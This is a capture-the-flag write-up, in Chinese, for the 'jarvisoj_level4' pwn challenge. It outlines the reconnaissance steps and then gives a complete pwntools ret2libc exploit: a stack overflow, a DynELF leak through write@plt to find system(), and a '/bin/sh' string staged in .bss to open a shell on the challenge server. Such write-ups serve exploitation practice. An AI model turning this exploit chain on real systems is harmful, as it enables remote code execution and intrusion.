jarvisoj_level4

1,三连

jarvisoj_level4_第1张图片
2,偏移
jarvisoj_level4_第2张图片
3,IDA静态查看是否有ret利用点
jarvisoj_level4_第3张图片
思路:ret2libc,泄露_write来获取Libc基址
4,ldd查看
在这里插入图片描述

5,payload
自动查Libc版本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
from time import sleep
import sys
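context.binary = "./level4"
elf = context.binary
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]

# Target selection: "l" as the first CLI argument runs the local binary,
# any other value connects to the challenge service.  The length guard keeps
# a bare `python script.py` from dying with IndexError before doing anything;
# a missing argument falls through to the same branch as any non-"l" value.
if len(sys.argv) > 1 and sys.argv[1] == "l":
    io = process("./level4")
else:
    io = remote('node4.buuoj.cn', 28365)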

def leak(addr):
    """Read 4 bytes of target memory at `addr` and return them (DynELF callback).

    Each call re-triggers the stack overflow: the padding reaches the saved
    return address, which is overwritten with write@plt; `_start` is placed as
    write's return address so the program restarts cleanly and can be
    overflowed again for the next lookup.  write's arguments are
    (fd=1, buf=addr, len=4), so the 4 leaked bytes arrive on stdout.
    """
    # 0x88 + 4: overflow distance to the return address (the offset found in
    # step 2 of the write-up); the extra 4 presumably covers the saved ebp.
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    # Short pause so the 4-byte reply is in the socket before recv(); the
    # delay is timing-based, so a slow remote may need a larger value.
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked

# Resolve system() through DynELF: it walks the loaded libc's link_map and
# symbol tables using only the leak() primitive, so no libc version or
# base-address arithmetic is needed (the "auto libc lookup" the write-up refers to).
d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')
success("system -> {:#x}".format(system_addr))
# Wait for Enter before the final stage, e.g. to attach a debugger to a
# local process (see the gdb.attach line below).
pause()

#  gdb.attach(io)
# Stage 1: call read(0, bss+0x500, 8) via the overflow, returning to _start
# afterwards, so the 8-byte string sent next is stored at a fixed address
# inside .bss that the binary itself owns.
payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)
io.send(payload)
sleep(0.01)
io.send("/bin/sh\0")
sleep(0.01)

# Stage 2: overflow again and return into system(bss+0x500); 'aaaa' is a
# throwaway return address for system, which is never meant to return.
payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
io.send(payload)

io.interactive()
